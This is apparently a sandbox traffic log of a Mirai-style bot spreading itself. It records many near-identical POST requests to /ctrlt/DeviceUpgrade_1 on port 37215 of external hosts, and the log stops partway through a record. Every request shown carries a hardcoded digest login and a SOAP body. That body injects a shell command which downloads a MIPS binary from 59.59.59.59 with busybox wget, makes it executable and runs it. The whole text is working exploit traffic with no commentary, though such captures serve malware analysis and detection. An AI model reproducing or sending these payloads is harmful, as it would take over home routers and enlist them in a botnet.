                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1204192.168.2.1544164157.56.168.12137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.741456985 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1205192.168.2.1547714203.177.47.1437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.741477966 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1206192.168.2.154875841.180.87.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.741564989 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1207192.168.2.155288041.151.203.11937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.741622925 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1208192.168.2.1542026197.238.182.14637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.741892099 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1209192.168.2.1549556197.199.31.9837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.741919994 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1210192.168.2.1542566139.180.127.5637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.741978884 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1211192.168.2.1535910197.192.76.7037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.742018938 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1212192.168.2.155002294.118.165.25537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.744138956 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1213192.168.2.154551041.25.202.16637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.745013952 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
